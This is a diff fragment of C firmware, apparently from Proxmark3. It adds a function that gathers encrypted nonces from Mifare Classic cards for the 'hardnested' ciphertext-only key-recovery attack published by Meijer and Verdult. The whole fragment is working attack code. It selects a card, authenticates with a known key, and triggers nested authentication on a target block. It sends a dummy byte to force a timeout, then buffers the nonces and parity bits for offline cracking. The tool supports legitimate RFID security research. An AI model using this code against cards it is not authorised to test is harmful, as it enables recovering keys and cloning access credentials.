+//-----------------------------------------------------------------------------\r
+// acquire encrypted nonces in order to perform the attack described in\r
+// Carlo Meijer, Roel Verdult, "Ciphertext-only Cryptanalysis on Hardened\r
+// Mifare Classic Cards" in Proceedings of the 22nd ACM SIGSAC Conference on \r
+// Computer and Communications Security, 2015\r
+//-----------------------------------------------------------------------------\r
+void MifareAcquireEncryptedNonces(uint32_t arg0, uint32_t arg1, uint32_t flags, uint8_t *datain)\r
+{\r
+ uint64_t ui64Key = 0;\r
+ uint8_t uid[10];\r
+ uint32_t cuid;\r
+ uint8_t cascade_levels = 0;\r
+ struct Crypto1State mpcs = {0, 0};\r
+ struct Crypto1State *pcs;\r
+ pcs = &mpcs;\r
+ uint8_t receivedAnswer[MAX_MIFARE_FRAME_SIZE];\r
+ int16_t isOK = 0;\r
+ uint8_t par_enc[1];\r
+ uint8_t nt_par_enc = 0;\r
+ uint8_t buf[USB_CMD_DATA_SIZE];\r
+ uint32_t timeout;\r
+ \r
+ uint8_t blockNo = arg0 & 0xff;\r
+ uint8_t keyType = (arg0 >> 8) & 0xff;\r
+ uint8_t targetBlockNo = arg1 & 0xff;\r
+ uint8_t targetKeyType = (arg1 >> 8) & 0xff;\r
+ ui64Key = bytes_to_num(datain, 6);\r
+ bool initialize = flags & 0x0001;\r
+ bool slow = flags & 0x0002;\r
+ bool field_off = flags & 0x0004;\r
+ \r
+ LED_A_ON();\r
+ LED_C_OFF();\r
+\r
+ if (initialize) {\r
+ iso14443a_setup(FPGA_HF_ISO14443A_READER_LISTEN);\r
+ clear_trace();\r
+ set_tracing(true);\r
+ }\r
+ \r
+ LED_C_ON();\r
+ \r
+ uint16_t num_nonces = 0;\r
+ bool have_uid = false;\r
+ for (uint16_t i = 0; i <= USB_CMD_DATA_SIZE - 9; ) {\r
+\r
+ // Test if the action was cancelled\r
+ if(BUTTON_PRESS()) {\r
+ isOK = 2;\r
+ field_off = true;\r
+ break;\r
+ }\r
+\r
+ if (!have_uid) { // need a full select cycle to get the uid first\r
+ iso14a_card_select_t card_info; \r
+ if(!iso14443a_select_card(uid, &card_info, &cuid, true, 0)) {\r
+ if (MF_DBGLEVEL >= 1) Dbprintf("AcquireNonces: Can't select card (ALL)");\r
+ continue;\r
+ }\r
+ switch (card_info.uidlen) {\r
+ case 4 : cascade_levels = 1; break;\r
+ case 7 : cascade_levels = 2; break;\r
+ case 10: cascade_levels = 3; break;\r
+ default: break;\r
+ }\r
+ have_uid = true; \r
+ } else { // no need for anticollision. We can directly select the card\r
+ if(!iso14443a_select_card(uid, NULL, NULL, false, cascade_levels)) {\r
+ if (MF_DBGLEVEL >= 1) Dbprintf("AcquireNonces: Can't select card (UID)");\r
+ continue;\r
+ }\r
+ }\r
+ \r
+ if (slow) {\r
+ timeout = GetCountSspClk() + PRE_AUTHENTICATION_LEADTIME;\r
+ while(GetCountSspClk() < timeout);\r
+ }\r
+\r
+ uint32_t nt1;\r
+ if (mifare_classic_authex(pcs, cuid, blockNo, keyType, ui64Key, AUTH_FIRST, &nt1, NULL)) {\r
+ if (MF_DBGLEVEL >= 1) Dbprintf("AcquireNonces: Auth1 error");\r
+ continue;\r
+ }\r
+\r
+ // nested authentication\r
+ uint16_t len = mifare_sendcmd_short(pcs, AUTH_NESTED, 0x60 + (targetKeyType & 0x01), targetBlockNo, receivedAnswer, par_enc, NULL);\r
+ if (len != 4) {\r
+ if (MF_DBGLEVEL >= 1) Dbprintf("AcquireNonces: Auth2 error len=%d", len);\r
+ continue;\r
+ }\r
+ \r
+ // send a dummy byte as reader response in order to trigger the cards authentication timeout\r
+ uint8_t dummy_answer = 0;\r
+ ReaderTransmit(&dummy_answer, 1, NULL);\r
+ timeout = GetCountSspClk() + AUTHENTICATION_TIMEOUT;\r
+ \r
+ num_nonces++;\r
+ if (num_nonces % 2) {\r
+ memcpy(buf+i, receivedAnswer, 4);\r
+ nt_par_enc = par_enc[0] & 0xf0;\r
+ } else {\r
+ nt_par_enc |= par_enc[0] >> 4;\r
+ memcpy(buf+i+4, receivedAnswer, 4);\r
+ memcpy(buf+i+8, &nt_par_enc, 1);\r
+ i += 9;\r
+ }\r
+\r
+ // wait for the card to become ready again\r
+ while(GetCountSspClk() < timeout);\r
+ \r
+ }\r
+\r
+ LED_C_OFF();\r
+ \r
+ crypto1_destroy(pcs);\r
+ \r
+ LED_B_ON();\r
+ cmd_send(CMD_ACK, isOK, cuid, num_nonces, buf, sizeof(buf));\r
+ LED_B_OFF();\r
+\r
+ if (MF_DBGLEVEL >= 3) DbpString("AcquireEncryptedNonces finished");\r
+\r
+ if (field_off) {\r
+ FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);\r
+ LEDsoff();\r
+ }\r
+}\r
+\r